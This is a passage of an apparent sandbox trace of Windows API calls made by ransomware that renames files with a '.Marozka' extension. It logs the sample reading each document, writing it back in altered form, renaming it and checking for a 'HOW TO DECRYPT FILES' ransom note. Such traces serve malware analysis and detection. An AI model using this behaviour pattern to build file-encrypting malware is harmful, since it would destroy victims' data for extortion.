(lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\yeekt6fzj.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.731] GetFileType (hFile=0x2e0) returned 0x1 [0050.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0050.732] GetFileType (hFile=0x2e0) returned 0x1 [0050.732] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x5423 [0050.732] ReadFile (in: hFile=0x2e0, lpBuffer=0x26a3f3c, nNumberOfBytesToRead=0x5423, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26a3f3c*, lpNumberOfBytesRead=0x5beabc*=0x5423, lpOverlapped=0x0) returned 1 [0050.733] CloseHandle (hObject=0x2e0) returned 1 [0050.995] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0050.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0050.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0050.996] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", lpFilePart=0x0) returned 0x28 [0050.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0050.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\yeekt6fzj.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0050.997] GetFileType (hFile=0x2e0) returned 0x1 [0050.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0050.997] GetFileType (hFile=0x2e0) returned 0x1 [0050.997] WriteFile (in: hFile=0x2e0, lpBuffer=0x270b218*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x270b218*, lpNumberOfBytesWritten=0x5beab0*=0x5430, lpOverlapped=0x0) returned 1 [0051.001] CloseHandle (hObject=0x2e0) returned 1 [0051.003] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx", lpFilePart=0x0) returned 0x28 [0051.003] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx.Marozka", lpFilePart=0x0) returned 0x30 [0051.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0051.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\yeekt6fzj.docx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8330dc70, ftCreationTime.dwHighDateTime=0x1d4c96e, ftLastAccessTime.dwLowDateTime=0x851f8180, ftLastAccessTime.dwHighDateTime=0x1d4b861, ftLastWriteTime.dwLowDateTime=0xe121cb53, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x5430)) returned 1 [0051.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0051.003] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\yeekt6fzj.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\YEEkt6fZj.docx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\yeekt6fzj.docx.marozka")) returned 1 [0051.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0051.004] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q", lpFilePart=0x0) returned 0x2d [0051.004] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dc48 [0051.004] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.004] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.004] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.005] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.005] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.005] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.005] FindNextFileW (in: hFindFile=0xa7dc48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0051.005] FindClose (in: hFindFile=0xa7dc48 | out: hFindFile=0xa7dc48) returned 1 [0051.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0051.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0051.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0051.006] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q", lpFilePart=0x0) returned 0x2d [0051.006] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d688 [0051.006] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.006] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.006] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.006] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.007] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.007] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0051.007] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0051.007] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0051.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0051.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0051.007] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", lpFilePart=0x0) returned 0x42 [0051.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0051.007] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\a 9iz3vyo6dr-9vy.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.008] GetFileType (hFile=0x2e0) returned 0x1 [0051.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.008] GetFileType (hFile=0x2e0) returned 0x1 [0051.008] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x18977 [0051.008] ReadFile (in: hFile=0x2e0, lpBuffer=0x36d1880, nNumberOfBytesToRead=0x18977, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x36d1880*, lpNumberOfBytesRead=0x5bea48*=0x18977, lpOverlapped=0x0) returned 1 [0051.012] CloseHandle (hObject=0x2e0) returned 1 [0051.057] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0051.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0051.057] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", lpFilePart=0x0) returned 0x42 [0051.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0051.057] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\a 9iz3vyo6dr-9vy.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.059] GetFileType (hFile=0x2e0) returned 0x1 [0051.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0051.059] GetFileType (hFile=0x2e0) returned 0x1 [0051.059] WriteFile (in: hFile=0x2e0, lpBuffer=0x374c838*, nNumberOfBytesToWrite=0x18980, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x374c838*, lpNumberOfBytesWritten=0x5bea3c*=0x18980, lpOverlapped=0x0) returned 1 [0051.061] CloseHandle (hObject=0x2e0) returned 1 [0051.064] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt", lpFilePart=0x0) returned 0x42 [0051.064] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt.Marozka", lpFilePart=0x0) returned 0x4a [0051.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0051.064] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\a 9iz3vyo6dr-9vy.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2a7b30, ftCreationTime.dwHighDateTime=0x1d4ce1c, ftLastAccessTime.dwLowDateTime=0x7111c350, ftLastAccessTime.dwHighDateTime=0x1d4c852, ftLastWriteTime.dwLowDateTime=0xe12b5490, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18980)) returned 1 [0051.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0051.065] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\a 9iz3vyo6dr-9vy.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\A 9Iz3vYo6DR-9vy.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\a 9iz3vyo6dr-9vy.odt.marozka")) returned 1 [0051.065] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", lpFilePart=0x0) returned 0x3c [0051.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0051.066] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\pg7lc1gq3.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.066] GetFileType (hFile=0x2e0) returned 0x1 [0051.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0051.066] GetFileType (hFile=0x2e0) returned 0x1 [0051.066] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x18b87 [0051.067] ReadFile (in: hFile=0x2e0, lpBuffer=0x37651d8, nNumberOfBytesToRead=0x18b87, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x37651d8*, lpNumberOfBytesRead=0x5bea48*=0x18b87, lpOverlapped=0x0) returned 1 [0051.069] CloseHandle (hObject=0x2e0) returned 1 [0051.149] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0051.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0051.149] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", lpFilePart=0x0) returned 0x3c [0051.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0051.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\pg7lc1gq3.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.152] GetFileType (hFile=0x2e0) returned 0x1 [0051.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0051.152] GetFileType (hFile=0x2e0) returned 0x1 [0051.152] WriteFile (in: hFile=0x2e0, lpBuffer=0x37e0be0*, nNumberOfBytesToWrite=0x18b90, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x37e0be0*, lpNumberOfBytesWritten=0x5bea3c*=0x18b90, lpOverlapped=0x0) returned 1 [0051.212] CloseHandle (hObject=0x2e0) returned 1 [0051.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx", lpFilePart=0x0) returned 0x3c [0051.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx.Marozka", lpFilePart=0x0) returned 0x44 [0051.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0051.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\pg7lc1gq3.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab47320, ftCreationTime.dwHighDateTime=0x1d4c7cb, ftLastAccessTime.dwLowDateTime=0xba632ae0, ftLastAccessTime.dwHighDateTime=0x1d4cf0e, ftLastWriteTime.dwLowDateTime=0xe140c8bf, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18b90)) returned 1 [0051.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0051.215] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\pg7lc1gq3.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Pg7lc1gQ3.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\pg7lc1gq3.xlsx.marozka")) returned 1 [0051.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0051.216] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r", lpFilePart=0x0) returned 0x41 [0051.282] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7dbc8 [0051.282] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.282] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.282] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.283] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0051.284] FindClose (in: hFindFile=0xa7dbc8 | out: hFindFile=0xa7dbc8) returned 1 [0051.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0051.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0051.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0051.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r", lpFilePart=0x0) returned 0x41 [0051.284] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d708 [0051.284] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.285] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.285] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.285] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.285] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.285] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.286] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0051.286] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0051.286] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0051.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0051.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0051.286] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf", lpFilePart=0x0) returned 0x54 [0051.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0051.286] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\bxLcD7fVcgQMNC.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\bxlcd7fvcgqmnc.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.287] GetFileType (hFile=0x2e0) returned 0x1 [0051.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0051.287] GetFileType (hFile=0x2e0) returned 0x1 [0051.287] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xc65c [0051.287] ReadFile (in: hFile=0x2e0, lpBuffer=0x27afa10, nNumberOfBytesToRead=0xc65c, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27afa10*, lpNumberOfBytesRead=0x5be9d4*=0xc65c, lpOverlapped=0x0) returned 1 [0051.287] CloseHandle (hObject=0x2e0) returned 1 [0051.445] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.445] SetThreadErrorMode (dwNewMode=0x1, 